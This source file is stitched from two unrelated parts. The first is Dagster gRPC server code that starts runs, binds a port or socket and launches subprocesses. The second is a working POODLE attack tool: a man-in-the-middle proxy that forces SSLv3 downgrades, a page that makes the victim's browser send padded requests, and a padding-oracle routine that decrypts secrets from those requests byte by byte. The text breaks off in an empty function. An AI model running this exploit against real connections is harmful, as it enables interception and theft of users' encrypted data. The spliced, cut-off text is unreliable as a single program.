            run_id = execute_run_args.pipeline_run_id
            recon_pipeline = self._recon_pipeline_from_origin(execute_run_args.pipeline_origin)
        except Exception:
            return api_pb2.StartRunReply(
                serialized_start_run_result=serialize_dagster_namedtuple(
                    StartRunResult(
                        success=False,
                        message=None,
                        serializable_error_info=serializable_error_info_from_exc_info(
                            sys.exc_info()
                        ),
                    )
                )
            )
        event_queue = self._mp_ctx.Queue()
        termination_event = self._mp_ctx.Event()
        execution_process = self._mp_ctx.Process(
            target=start_run_in_subprocess,
            args=[
                request.serialized_execute_run_args,
                recon_pipeline,
                event_queue,
                termination_event,
            ],
        )
        with self._execution_lock:
            execution_process.start()
            self._executions[run_id] = (
                execution_process,
                execute_run_args.instance_ref,
            )
            self._termination_events[run_id] = termination_event
        success = None
        message = None
        serializable_error_info = None
        while success is None:
            sleep(EVENT_QUEUE_POLL_INTERVAL)
            # We use `get_nowait()` instead of `get()` so that we can handle the case where the
            # execution process has died unexpectedly -- `get()` would hang forever in that case
            try:
                dagster_event_or_ipc_error_message_or_done = event_queue.get_nowait()
            except queue.Empty:
                if not execution_process.is_alive():
                    # subprocess died unexpectedly
                    success = False
                    message = (
                        f"GRPC server: Subprocess for {run_id} terminated unexpectedly with "
                        f"exit code {execution_process.exitcode}"
                    )
                    serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
            else:
                if isinstance(
                    dagster_event_or_ipc_error_message_or_done, StartRunInSubprocessSuccessful
                ):
                    success = True
                elif isinstance(
                    dagster_event_or_ipc_error_message_or_done, RunInSubprocessComplete
                ):
                    continue
                if isinstance(dagster_event_or_ipc_error_message_or_done, IPCErrorMessage):
                    success = False
                    message = dagster_event_or_ipc_error_message_or_done.message
                    serializable_error_info = (
                        dagster_event_or_ipc_error_message_or_done.serializable_error_info
                    )
        # Ensure that if the run failed, we remove it from the executions map before
        # returning so that CanCancel will never return True
        if not success:
            with self._execution_lock:
                self._clear_run(run_id)
        return api_pb2.StartRunReply(
            serialized_start_run_result=serialize_dagster_namedtuple(
                StartRunResult(
                    success=success,
                    message=message,
                    serializable_error_info=serializable_error_info,
                )
            )
        )

    def GetCurrentImage(self, request, _context):
        """Return the container image this server was started in, if any."""
        return api_pb2.GetCurrentImageReply(
            serialized_current_image=serialize_dagster_namedtuple(
                GetCurrentImageResult(
                    current_image=_get_current_image(), serializable_error_info=None
                )
            )
        )
def _get_current_image():
return os.getenv("DAGSTER_CURRENT_IMAGE")
@whitelist_for_serdes
class GrpcServerStartedEvent(namedtuple("GrpcServerStartedEvent", "")):
    """IPC event sent to the parent process once the gRPC server is serving."""

    pass
@whitelist_for_serdes
class GrpcServerFailedToBindEvent(namedtuple("GrpcServerFailedToBindEvent", "")):
    """IPC event sent when the server could not bind its port or socket.

    Fix: the underlying namedtuple typename was "GrpcServerStartedEvent"
    (copy-paste from the class above), which made repr()/pickling report the
    wrong name. NOTE(review): this assumes serdes keys on the class's
    __name__ rather than the namedtuple typename -- confirm against the
    whitelist_for_serdes implementation before shipping.
    """

    pass
@whitelist_for_serdes
class GrpcServerLoadErrorEvent(
    NamedTuple("GrpcServerLoadErrorEvent", [("error_info", SerializableErrorInfo)])
):
    """IPC event carrying the error raised while loading user code at startup."""

    def __new__(cls, error_info: SerializableErrorInfo):
        return super(GrpcServerLoadErrorEvent, cls).__new__(
            cls,
            check.inst_param(error_info, "error_info", SerializableErrorInfo),
        )
def server_termination_target(termination_event, server):
    """Block until `termination_event` is set, then stop the gRPC `server`.

    Intended to run on a daemon thread; the grace period lets in-flight
    RPCs finish before the server shuts down.
    """
    termination_event.wait()
    # We could make this grace period configurable if we set it in the ShutdownServer handler
    server.stop(grace=5)
class DagsterGrpcServer:
    """Hosts a DagsterApiServer over gRPC on a TCP port or a Unix socket.

    Wires up the API servicer and a gRPC health-check service, binds the
    address, and (optionally) reports startup/bind-failure/load-error
    events to a parent process over an IPC stream.
    """

    def __init__(
        self,
        host="localhost",
        port=None,
        socket=None,
        max_workers=None,
        loadable_target_origin=None,
        heartbeat=False,
        heartbeat_timeout=30,
        lazy_load_user_code=False,
        ipc_output_file=None,
        fixed_server_id=None,
        entry_point=None,
    ):
        """Validate arguments, build the servicer, and bind the server address.

        Exactly one of `port`/`socket` must be provided (Windows requires
        `port`).

        Raises:
            CouldNotBindGrpcServerToAddress: if the port/socket cannot be bound.
        """
        check.opt_str_param(host, "host")
        check.opt_int_param(port, "port")
        check.opt_str_param(socket, "socket")
        check.opt_int_param(max_workers, "max_workers")
        check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
        check.invariant(
            port is not None if seven.IS_WINDOWS else True,
            "You must pass a valid `port` on Windows: `socket` not supported.",
        )
        check.invariant(
            (port or socket) and not (port and socket),
            "You must pass one and only one of `port` or `socket`.",
        )
        check.invariant(
            host is not None if port else True,
            "Must provide a host when serving on a port",
        )
        check.bool_param(heartbeat, "heartbeat")
        check.int_param(heartbeat_timeout, "heartbeat_timeout")
        self._ipc_output_file = check.opt_str_param(ipc_output_file, "ipc_output_file")
        check.opt_str_param(fixed_server_id, "fixed_server_id")
        check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
        check.invariant(
            max_workers is None or max_workers > 1 if heartbeat else True,
            "max_workers must be greater than 1 or set to None if heartbeat is True. "
            "If set to None, the server will use the gRPC default.",
        )
        self.server = grpc.server(
            ThreadPoolExecutor(max_workers=max_workers),
            compression=grpc.Compression.Gzip,
            options=[
                ("grpc.max_send_message_length", max_send_bytes()),
                ("grpc.max_receive_message_length", max_rx_bytes()),
            ],
        )
        self._server_termination_event = threading.Event()
        try:
            self._api_servicer = DagsterApiServer(
                server_termination_event=self._server_termination_event,
                loadable_target_origin=loadable_target_origin,
                heartbeat=heartbeat,
                heartbeat_timeout=heartbeat_timeout,
                lazy_load_user_code=lazy_load_user_code,
                fixed_server_id=fixed_server_id,
                entry_point=entry_point,
            )
        except Exception:
            # Forward the user-code load error to the parent process (if any)
            # before re-raising, so the parent can surface it.
            if self._ipc_output_file:
                with ipc_write_stream(self._ipc_output_file) as ipc_stream:
                    ipc_stream.send(
                        GrpcServerLoadErrorEvent(
                            error_info=serializable_error_info_from_exc_info(sys.exc_info())
                        )
                    )
            raise
        # Create a health check servicer
        self._health_servicer = health.HealthServicer()
        health_pb2_grpc.add_HealthServicer_to_server(self._health_servicer, self.server)
        add_DagsterApiServicer_to_server(self._api_servicer, self.server)
        if port:
            server_address = host + ":" + str(port)
        else:
            server_address = "unix:" + os.path.abspath(socket)
        # grpc.Server.add_insecure_port returns:
        # - 0 on failure
        # - port number when a port is successfully bound
        # - 1 when a UDS is successfully bound
        res = self.server.add_insecure_port(server_address)
        if socket and res != 1:
            if self._ipc_output_file:
                with ipc_write_stream(self._ipc_output_file) as ipc_stream:
                    ipc_stream.send(GrpcServerFailedToBindEvent())
            raise CouldNotBindGrpcServerToAddress(socket)
        if port and res != port:
            if self._ipc_output_file:
                with ipc_write_stream(self._ipc_output_file) as ipc_stream:
                    ipc_stream.send(GrpcServerFailedToBindEvent())
            raise CouldNotBindGrpcServerToAddress(port)

    def serve(self):
        """Start serving and block until the termination event stops the server."""
        # Unfortunately it looks like ports bind late (here) and so this can fail with an error
        # from C++ like:
        #
        # E0625 08:46:56.180112000 4697443776 server_chttp2.cc:40]
        # {"created":"@1593089216.180085000","description":"Only 1 addresses added out of total
        # 2 resolved","file":"src/core/ext/transport/chttp2/server/chttp2_server.cc",
        # "file_line":406,"referenced_errors":[{"created":"@1593089216.180083000","description":
        # "Unable to configure socket","fd":6,"file":
        # "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":217,
        # "referenced_errors":[{"created":"@1593089216.180079000",
        # "description":"Address already in use","errno":48,"file":
        # "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":190,"os_error":
        # "Address already in use","syscall":"bind"}]}]}
        #
        # This is printed to stdout and there is no return value from server.start or exception
        # raised in Python that we can use to handle this. The standard recipes for hijacking C
        # stdout (so we could inspect this output and respond accordingly), e.g.
        # https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/, don't seem
        # to work (at least on Mac OS X) against grpc, and in any case would involve a huge
        # cross-version and cross-platform maintenance burden. We have an issue open against grpc,
        # https://github.com/grpc/grpc/issues/23315, and our own tracking issue at
        self.server.start()
        # Note: currently this is hardcoded as serving, since both services are cohosted
        # pylint: disable=no-member
        self._health_servicer.set("DagsterApi", health_pb2.HealthCheckResponse.SERVING)
        if self._ipc_output_file:
            with ipc_write_stream(self._ipc_output_file) as ipc_stream:
                ipc_stream.send(GrpcServerStartedEvent())
        server_termination_thread = threading.Thread(
            target=server_termination_target,
            args=[self._server_termination_event, self.server],
            name="grpc-server-termination",
        )
        server_termination_thread.daemon = True
        server_termination_thread.start()
        self.server.wait_for_termination()
        server_termination_thread.join()
        self._api_servicer.cleanup()
class CouldNotStartServerProcess(Exception):
    """Raised when a gRPC server subprocess never became reachable."""

    def __init__(self, port=None, socket=None):
        location = f"port {port}" if port is not None else f"socket {socket}"
        super(CouldNotStartServerProcess, self).__init__(
            f"Could not start server with {location}"
        )
def wait_for_grpc_server(server_process, client, subprocess_args, timeout=60):
    """Poll `client.ping` until the server responds or `timeout` elapses.

    Arguments:
        server_process: the spawned server subprocess (checked for early exit).
        client: gRPC client pointed at the server.
        subprocess_args: CLI args used to launch the server (for error messages).
        timeout: seconds to wait before giving up.

    Raises:
        Exception: on timeout, or if the server process exits while starting.
    """
    start_time = time.time()
    last_error = None
    while True:
        try:
            client.ping("")
            return
        except DagsterUserCodeUnreachableError:
            last_error = serializable_error_info_from_exc_info(sys.exc_info())
        if time.time() - start_time > timeout:
            raise Exception(
                f"Timed out waiting for gRPC server to start with arguments: \"{' '.join(subprocess_args)}\". Most recent connection error: {str(last_error)}"
            )
        # Fix: `!= None` -> `is not None` (identity comparison per PEP 8).
        if server_process.poll() is not None:
            raise Exception(
                f"gRPC server exited with return code {server_process.returncode} while starting up with the command: \"{' '.join(subprocess_args)}\""
            )
        sleep(0.1)
def open_server_process(
    port,
    socket,
    loadable_target_origin=None,
    max_workers=None,
    heartbeat=False,
    heartbeat_timeout=30,
    fixed_server_id=None,
    startup_timeout=20,
):
    """Spawn a `dagster api grpc` subprocess and wait until it responds to pings.

    Exactly one of `port`/`socket` must be provided.

    Returns:
        The started subprocess handle. If the server does not become
        reachable within `startup_timeout` seconds, the subprocess is
        terminated and the underlying exception re-raised.
    """
    check.invariant((port or socket) and not (port and socket), "Set only port or socket")
    check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
    check.opt_int_param(max_workers, "max_workers")
    # Imported here to avoid a circular import at module load time.
    from dagster.core.test_utils import get_mocked_system_timezone
    mocked_system_timezone = get_mocked_system_timezone()
    executable_path = loadable_target_origin.executable_path if loadable_target_origin else None
    # Build the CLI invocation; each optional flag is appended only when set.
    subprocess_args = (
        (
            get_python_environment_entry_point(executable_path)
            if executable_path
            else DEFAULT_DAGSTER_ENTRY_POINT
        )
        + ["api", "grpc"]
        + ["--lazy-load-user-code"]
        + (["--port", str(port)] if port else [])
        + (["--socket", socket] if socket else [])
        + (["-n", str(max_workers)] if max_workers else [])
        + (["--heartbeat"] if heartbeat else [])
        + (["--heartbeat-timeout", str(heartbeat_timeout)] if heartbeat_timeout else [])
        + (["--fixed-server-id", fixed_server_id] if fixed_server_id else [])
        + (["--override-system-timezone", mocked_system_timezone] if mocked_system_timezone else [])
        + (["--log-level", "WARNING"])  # don't log INFO messages for automatically spun up servers
        + (["--use-python-environment-entry-point"] if executable_path else [])
    )
    if loadable_target_origin:
        subprocess_args += loadable_target_origin.get_cli_args()
    server_process = open_ipc_subprocess(subprocess_args)
    # Imported here to avoid a circular import at module load time.
    from dagster.grpc.client import DagsterGrpcClient
    client = DagsterGrpcClient(
        port=port,
        socket=socket,
        host="localhost",
    )
    try:
        wait_for_grpc_server(server_process, client, subprocess_args, timeout=startup_timeout)
    except:
        # Don't leak the subprocess if startup failed; re-raise the cause.
        if server_process.poll() is None:
            server_process.terminate()
        raise
    return server_process
def open_server_process_on_dynamic_port(
    max_retries=10,
    loadable_target_origin=None,
    max_workers=None,
    heartbeat=False,
    heartbeat_timeout=30,
    fixed_server_id=None,
    startup_timeout=20,
):
    """Launch a gRPC server subprocess on a free TCP port, retrying bind failures.

    Returns:
        (server_process, port): the subprocess (or None if every attempt
        failed) and the last port tried (None if no attempt was made).
    """
    server_process = None
    # Fix: initialize `port` so that (None, None) is returned instead of
    # raising UnboundLocalError when max_retries <= 0.
    port = None
    retries = 0
    while server_process is None and retries < max_retries:
        port = find_free_port()
        try:
            server_process = open_server_process(
                port=port,
                socket=None,
                loadable_target_origin=loadable_target_origin,
                max_workers=max_workers,
                heartbeat=heartbeat,
                heartbeat_timeout=heartbeat_timeout,
                fixed_server_id=fixed_server_id,
                startup_timeout=startup_timeout,
            )
        except CouldNotBindGrpcServerToAddress:
            # The port was taken between find_free_port() and bind; try another.
            pass
        retries += 1
    return server_process, port
class GrpcServerProcess:
    """Owns a Dagster gRPC user-code server running in a child process.

    On Windows (or with `force_port=True`) the server binds a dynamically
    chosen TCP port; otherwise it binds a temporary Unix socket.
    """

    def __init__(
        self,
        loadable_target_origin=None,
        force_port=False,
        max_retries=10,
        max_workers=None,
        heartbeat=False,
        heartbeat_timeout=30,
        fixed_server_id=None,
        startup_timeout=20,
    ):
        self.port = None
        self.socket = None
        self.server_process = None
        self.loadable_target_origin = check.opt_inst_param(
            loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
        )
        check.bool_param(force_port, "force_port")
        check.int_param(max_retries, "max_retries")
        check.opt_int_param(max_workers, "max_workers")
        check.bool_param(heartbeat, "heartbeat")
        check.int_param(heartbeat_timeout, "heartbeat_timeout")
        check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
        check.opt_str_param(fixed_server_id, "fixed_server_id")
        check.int_param(startup_timeout, "startup_timeout")
        check.invariant(
            max_workers is None or max_workers > 1 if heartbeat else True,
            "max_workers must be greater than 1 or set to None if heartbeat is True. "
            "If set to None, the server will use the gRPC default.",
        )

        # Launch options shared by both the TCP-port and Unix-socket paths.
        launch_kwargs = dict(
            loadable_target_origin=loadable_target_origin,
            max_workers=max_workers,
            heartbeat=heartbeat,
            heartbeat_timeout=heartbeat_timeout,
            fixed_server_id=fixed_server_id,
            startup_timeout=startup_timeout,
        )

        if seven.IS_WINDOWS or force_port:
            # Windows has no Unix-socket support; fall back to a free TCP port.
            self.server_process, self.port = open_server_process_on_dynamic_port(
                max_retries=max_retries, **launch_kwargs
            )
        else:
            self.socket = safe_tempfile_path_unmanaged()
            self.server_process = open_server_process(
                port=None, socket=self.socket, **launch_kwargs
            )

        if self.server_process is None:
            raise CouldNotStartServerProcess(port=self.port, socket=self.socket)

    @property
    def pid(self):
        """OS process id of the server subprocess."""
        return self.server_process.pid

    def wait(self, timeout=30):
        """Block until the server subprocess exits (no-op if already gone)."""
        if self.server_process.poll() is None:
            seven.wait_for_process(self.server_process, timeout=timeout)

    def create_ephemeral_client(self):
        """Return a client that shuts this server down when it is closed."""
        from dagster.grpc.client import EphemeralDagsterGrpcClient

        return EphemeralDagsterGrpcClient(
            port=self.port, socket=self.socket, server_process=self.server_process
        )
|
main.py | import argparse
from urllib.parse import urlparse
import sys
import socket
import socketserver
import http.server
import struct
import select
from multiprocessing import Process, Manager
from multiprocessing.managers import BaseManager
from time import sleep, time
### Configuration ###
# select() timeout in seconds for the TLS record-forwarding loop
timeout = 30.0
### TLS/SSL ###
class TLSRecord:
    """A single SSL/TLS record read from a stream socket.

    Parses the 5-byte record header (content type, protocol version, payload
    length), then reads the full payload. ``raw`` always holds the exact
    bytes to forward on the wire.

    Raises:
        TypeError: if fewer than 5 header bytes arrive (peer is not
            speaking SSL/TLS, or closed the connection).
    """

    tlsContentType = {0: 'unknown', 20: 'change_cipher_spec', 21: 'alert', 22: 'handshake', 23: 'application_data'}
    # Content-type constants per RFC 6101/5246 (and the table above).
    # BUG FIX: TYPE_ALERT was 22, which is the *handshake* content type;
    # the alert records the padding oracle sends on rejection are type 21.
    TYPE_ALERT = 21
    TYPE_APPLICATION_DATA = 23

    def __init__(self, rsocket):
        self.raw = self._recv_exact(rsocket, 5)
        if len(self.raw) < 5:
            raise TypeError("Not a SSL/TLS packet")
        self.contentType, self.majorVersion, self.minorVersion, self.length = struct.unpack("!BBBH", self.raw)
        # Fall back to the same human-readable marker the table uses for
        # unknown types (previously the int 0 leaked into log output).
        self.textContentType = self.tlsContentType.get(self.contentType, 'unknown')
        # recv() may legally return fewer bytes than requested on a stream
        # socket; the original single recv() silently truncated large
        # records, corrupting the relayed TLS stream.
        self.content = self._recv_exact(rsocket, self.length)
        self.raw += self.content

    @staticmethod
    def _recv_exact(rsocket, length):
        """Receive exactly ``length`` bytes, stopping early only on EOF."""
        chunks = []
        remaining = length
        while remaining > 0:
            chunk = rsocket.recv(remaining)
            if not chunk:  # peer closed the connection
                break
            chunks.append(chunk)
            remaining -= len(chunk)
        return b''.join(chunks)

    def changeContent(self, newContent):
        """Replace the payload and rebuild the header/raw bytes to match."""
        self.content = newContent
        self.length = len(newContent)
        self.raw = struct.pack("!BBBH", self.contentType, self.majorVersion, self.minorVersion,
                               self.length) + self.content
class SSLTLSHandler(socketserver.BaseRequestHandler):
    """MITM handler that relays TLS records between victim and real server.

    Kills any TLS >= 1.0 handshake so the client downgrades to SSLv3, then
    forwards records in both directions, handing encrypted client
    application-data records to the per-victim POODLEAttack object for
    manipulation and feeding server responses back to it as the oracle.
    """

    def handle(self):
        print_debug("Received connection from {}".format(self.client_address[0]))
        tlsRecord = TLSRecord(self.request)
        victims = self.server.victims
        if tlsRecord.contentType == 0x16 and tlsRecord.majorVersion == 0x03 and tlsRecord.minorVersion > 0x00:  # TLS >= 1.0 handshake -> kill it to degrade!
            print_debug("Protocol minor version {:d} - trying to degrade.".format(tlsRecord.minorVersion))
            return
        else:
            print_debug("Client uses SSLv3")
        # BUG FIX: resolve the per-victim attack object *before* anything in
        # the try block can fail. Previously `key`/`victim` were assigned
        # after connect(), so a failed connect raised NameError (not the
        # intended cleanup) inside the finally block. Same for self.forward.
        key = self.client_address[0]
        try:
            victim = victims[key]
        except KeyError:
            victim = POODLEAttack()
        self.forward = None
        try:
            # Connect to the real server and replay the first record.
            self.forward = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.forward.connect((args.target_host, args.target_port))
            self.forward.sendall(tlsRecord.raw)
            while True:
                readable, writable, errors = select.select((self.request, self.forward), (),
                                                           (self.request, self.forward), timeout)
                if len(errors) > 0:
                    sockname = "unknown"
                    if errors[0] == self.request:
                        sockname = "client-side"
                    elif errors[0] == self.forward:
                        sockname = "server-side"
                    print_debug(sockname + " socket signalizes an error!")
                    break
                for rsocket in readable:
                    ssocket = None
                    rsockname = "unknown"
                    ssockname = "unknown"
                    record = TLSRecord(rsocket)
                    if rsocket == self.forward:
                        # Server -> client: let the attack object inspect the
                        # record for the oracle's accept/reject answer.
                        ssocket = self.request
                        rsockname = "server"
                        ssockname = "client"
                        victim.checkTLSRecord(record)
                    else:
                        ssocket = self.forward
                        rsockname = "client"
                        ssockname = "server"
                    print_debug(
                        "Forwarding TLS record type {} of length {:d} from {} to {}".format(record.textContentType,
                                                                                            len(record.raw), rsockname,
                                                                                            ssockname))
                    # Received encrypted application data with request from client to server - attack
                    # Firefox (and possibly other browsers) inititate communication with a small application data record that doesn't contains the request.
                    # This is not the packet that we want, because of this the length check is performed in addition.
                    if rsocket == self.request and record.contentType == TLSRecord.TYPE_APPLICATION_DATA and len(
                            record.content) > 50:
                        record.changeContent(victim.doAttack(record.content))
                    ssocket.sendall(record.raw)
        except IOError as e:  # expected from network i/o
            print_debug("I/O error: {} ({})".format(e.strerror, e.errno))
        except TypeError:  # Raised by base parsing code if packet is not TLS/SSL
            pass
        except StopIteration:
            pass
        finally:
            # Persist the (mutated) attack state back into the shared dict
            # and close the upstream socket if it was ever opened.
            victim.connectionFinished()
            victims[key] = victim
            if self.forward is not None:
                self.forward.close()
            print_debug("Connection closed!")
class SSLTLSProxy(socketserver.ThreadingMixIn, socketserver.TCPServer):
    """Threaded TCP server driving SSLTLSHandler; reuses the listen address
    so quick restarts don't fail with EADDRINUSE."""
    allow_reuse_address = True
### HTTP ###
class PoodleHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
    """HTTP side of the attack.

    Serves the JavaScript request generator to the victim's browser ("/")
    and answers "/nextRequest" with the URL/POST padding lengths the
    generator should use for its next HTTPS request.
    """

    def do_GET(self):
        self.victims = self.server.victims
        self.key = self.client_address[0]
        try:
            # BUG FIX: was `victims[self.key]` — a lookup on a module-level
            # global that only happens to exist in the fork start method;
            # the per-server shared dict is self.victims.
            self.victim = self.victims[self.key]
        except KeyError:
            self.victim = POODLEAttack()
        if self.path == "/":
            self.sendRequestGenerator()
        elif self.path == "/nextRequest":
            self.sendNextRequest()
        else:
            # Unknown paths (e.g. /favicon.ico) previously got no response
            # at all; answer them properly.
            self.send_error(404)
        self.victims[self.key] = self.victim

    def sendRequestGenerator(self):
        """Deliver the HTML/JS page that fires padded HTTPS requests."""
        print_debug("HTTP: Sending request generator")
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.end_headers()
        self.victim.expectTLSPacket()  # make POODLE attack object aware, that a TLS packet related to the attack will arrive
        response = """<!DOCTYPE html>
<h1>POODLE Request Generator</h1>
<script type="text/javascript">
""" + jsCode + """
</script>
"""
        response = response.replace("###URL###", args.targetURL)
        self.wfile.write(bytes(response, "utf-8"))

    def sendNextRequest(self):
        """Answer with "urlLength:postLength" for the generator's next request."""
        print_debug("HTTP: Sending next request parameters: url len={} post len={}".format(self.victim.urlLength,
                                                                                           self.victim.postLength))
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.end_headers()
        response = "{}:{}".format(self.victim.urlLength,
                                  self.victim.postLength)  # FIXME: sooooo un-threadsafe! But race condition shouldn't happen (famous last words (TM))
        self.victim.expectTLSPacket()  # make POODLE attack object aware, that a TLS packet related to the attack will arrive
        self.wfile.write(bytes(response, "utf-8"))

    def log_message(self, fmt, *arg):
        # Suppress per-request logging unless --debug was given.
        if args.debug:
            super().log_message(fmt, *arg)
        else:
            return

    def version_string(self):
        # Server header sent with every response.
        return "POODLE Request Generator"
### POODLE Attack ###
class POODLEAttack():
    """Per-victim state machine implementing the POODLE padding-oracle attack.

    Phase 1 (STATE_PADDING): grow the POST body one byte at a time until the
    encrypted record length jumps — the jump size reveals the CBC block size
    and the padding alignment.  Phase 2 (STATE_DECRYPT): for each target
    byte, copy its ciphertext block over the final (padding) block and let
    the server act as the oracle; an accepted record leaks one plaintext
    byte (STATE_DECRYPT_MODIFIED waits for that verdict).
    """

    STATE_PADDING = 1  # Fill padding until next length jump
    STATE_DECRYPT = 2  # Decryption stage - modify HTTP requests encrypted TLS application data packet
    STATE_DECRYPT_MODIFIED = 3  # Decryption stage - packet was manipulated, waiting for response of the oracle
    STATE_FINISHED = 100  # Something went wrong, passtrough mode

    def __init__(self):
        self.state = POODLEAttack.STATE_PADDING
        self.lastLength = None  # length of last received encrypted payload
        self.blockSize = None  # cipher block size determined from padding jumps
        self.urlLength = 0  # current length of URL for the web server - IMPORTANT: also change in POODLEClient.js!
        self.postLength = 26  # current length of POST payload for the web server - IMPORTANT: also change in POODLEClient.js!
        self.basePostLength = None  # current length of POST payload for the web server
        self.startDecryptOffset = int(args.start_offset)  # First byte from encrypted data to decrypt.
        self.decryptOffset = None  # Current byte to decrypt
        self.curBlock = None  # Block that contains current byte and should be moved to last (padding) block
        self.expectPacket = False  # indicator if packet was sent by HTTPS request generator. set when next request parameters are requested
        self.plaintext = None  # Is filled with leaked plaintext characters
        self.requestCounts = []  # List of request counts per leaked byte
        self.leakTimes = []  # List of times per leaked byte

    def expectTLSPacket(self):
        """Mark that the next TLS record belongs to a generated request."""
        print_debug("POODLE Attack: expecting packet")
        self.expectPacket = True

    def connectionFinished(self):
        """Reset per-connection state when the TLS connection closes."""
        print_debug("POODLE Attack: connection finished\n")
        if self.state == POODLEAttack.STATE_DECRYPT_MODIFIED:  # STATE_DECRYPT_MODIFIED state resets to STATE_DECRYPT on end of connection
            self.state = POODLEAttack.STATE_DECRYPT
        self.expectPacket = False

    def decryptNextByte(self):  # Calculate the request parameters for decryption of next byte
        """Advance to the next target byte and derive the URL/POST padding
        lengths that align it as the last byte of its cipher block."""
        if self.decryptOffset == None:
            self.decryptOffset = self.startDecryptOffset
        else:
            self.decryptOffset += 1
        self.requestCount = 0
        self.lastLeak = time()
        (self.curBlock, i) = divmod(self.decryptOffset, self.blockSize)
        self.urlLength = self.blockSize - i - 1
        self.postLength = self.basePostLength - self.urlLength
        print_debug(
            "POODLE Attack: next decrypt-byte: {} (block {}) url length: {} post length: {}".format(self.decryptOffset,
                                                                                                    self.curBlock,
                                                                                                    self.urlLength,
                                                                                                    self.postLength))

    def decryptByte(self, appData):  # positive oracle response - decrypt byte
        """The oracle accepted the manipulated record: recover one plaintext
        byte from the CBC relation and print progress statistics."""
        appDataB = [appData[i:i + self.blockSize] for i in range(0, len(appData), self.blockSize)]
        # CBC: last byte of accepted padding block decrypts to (blockSize-1);
        # XOR with both neighbouring ciphertext bytes yields the plaintext.
        plaintext = (self.blockSize - 1) ^ appDataB[self.curBlock - 1][self.blockSize - 1] ^ \
                    appDataB[len(appDataB) - 2][self.blockSize - 1]
        self.plaintext += chr(plaintext)
        leakTime = time() - self.lastLeak
        print("Decrypted byte {}: {} (0x{:02x}) in {:.4f} seconds with {} requests".format(self.decryptOffset,
                                                                                           chr(plaintext), plaintext,
                                                                                           leakTime, self.requestCount))
        self.requestCounts.append(self.requestCount)
        self.leakTimes.append(leakTime)
        numBytes = len(self.plaintext)
        sumReqCnt = sum(self.requestCounts)
        avgReqCnt = sumReqCnt / numBytes
        sumLeakTimes = sum(self.leakTimes)
        avgLeakTimes = sumLeakTimes / numBytes
        print(
            "Victim now leaked {} bytes: \"{}\" {} requests and {:.3f} seconds per leaked bytes, {} requests and {:.3f} seconds total".format(
                numBytes, self.plaintext, int(avgReqCnt), avgLeakTimes, sumReqCnt, sumLeakTimes))
        self.decryptNextByte()

    def doAttack(self, appData):
        """Process one encrypted client application-data record; returns the
        (possibly manipulated) payload to forward to the server."""
        if not self.expectPacket:  # Packet not expected - this must be signalized by the request generator
            print_debug("POODLE Attack: unexpected packet - forwarding")
            return appData
        if self.state == POODLEAttack.STATE_PADDING:
            if self.lastLength == None:  # first packet - store data length and pass
                self.lastLength = len(appData)
                print_debug("POODLE Attack: received first TLS packet with application data length = {}".format(
                    self.lastLength))
            elif self.lastLength > len(appData) or abs(self.lastLength - len(
                    appData)) > 16:  # length jump in the wrong direction or unexpected amount, just pass it
                print_debug(
                    "POODLE Attack: received packet ignored due to unexpected length jump. previous={} this={}".format(
                        self.lastLength, len(appData)))
            elif self.lastLength < len(appData):  # length jump, we know the padding length
                self.blockSize = len(appData) - self.lastLength  # difference is block size
                self.numBlocks = int(len(appData) / self.blockSize)
                self.basePostLength = self.postLength
                self.decryptNextByte()
                self.state = POODLEAttack.STATE_DECRYPT
                self.plaintext = ""
                self.lastLength = len(appData)
                print_debug(
                    "POODLE Attack: application data length jump detected - padding length is now known! length={} block size={} post size={}".format(
                        len(appData), self.blockSize, self.postLength))
            else:  # add further byte to POST data
                self.postLength += 1
                print_debug("POODLE Attack: adding a byte to POST data: {} bytes".format(self.postLength))
            return appData
        elif self.state == POODLEAttack.STATE_DECRYPT:  # decryption stage of the attack
            if len(appData) == self.lastLength:  # data size changes are not tolerated
                self.requestCount += 1
                print_debug("POODLE Attack: Trying to decrypt last byte of crypt block {}".format(self.curBlock))
                # Replace the final (padding) block with the target block so
                # the oracle decrypts the target byte for us.
                self.changedData = appData[:(self.numBlocks - 1) * self.blockSize] + appData[
                                                                                    self.curBlock * self.blockSize:(
                                                                                        self.curBlock + 1) * self.blockSize]
                self.state = POODLEAttack.STATE_DECRYPT_MODIFIED
                return self.changedData
            else:
                print_debug(
                    "POODLE Attack: received packet ignored due to unexpected length jump. expected={} this={}".format(
                        self.lastLength, len(appData)))
                return appData
        else:  # in any other case (including STATE_FINISHED): pass packets unaltered
            print_debug("POODLE Attack: attack finished or undefined state - passing packet")
            return appData

    def checkTLSRecord(self, record):  # Checks packet from server for oracle response
        """Interpret the server's answer to a manipulated record: an alert
        means rejection, application data means a byte was leaked."""
        if self.state == POODLEAttack.STATE_DECRYPT_MODIFIED:  # this is the state where an oracle response is expected
            if record.contentType == TLSRecord.TYPE_ALERT:
                self.state = POODLEAttack.STATE_DECRYPT
            elif record.contentType == TLSRecord.TYPE_APPLICATION_DATA:  # server accepted the manipulated packet - won one plaintext byte :-)
                self.decryptByte(self.changedData)
                self.state = POODLEAttack.STATE_DECRYPT
class POODLEManager(BaseManager):
    """Multiprocessing manager that can serve POODLEAttack proxies to the
    TLS and HTTP server processes."""
    pass


POODLEManager.register('POODLEAttack', POODLEAttack)
### Functions ###
def ssltlsServer(victims, poodleManager):
    """Run the SSL/TLS MITM proxy (blocks until interrupted).

    `victims` is the shared per-client attack-state dict; both it and the
    manager are attached to the server so handlers can reach them.
    """
    print("Starting SSL/TLS server on {}:{} forwarding to {}:{}".format(args.listen_host, args.listen_port_tls,
                                                                        args.target_host, args.target_port))
    proxy = SSLTLSProxy((args.listen_host, int(args.listen_port_tls)), SSLTLSHandler)
    proxy.victims = victims
    proxy.poodleManager = poodleManager
    try:
        proxy.serve_forever()
    except KeyboardInterrupt:
        print("Shutdown of SSL/TLS server on user request")
def httpServer(victims, poodleManager):
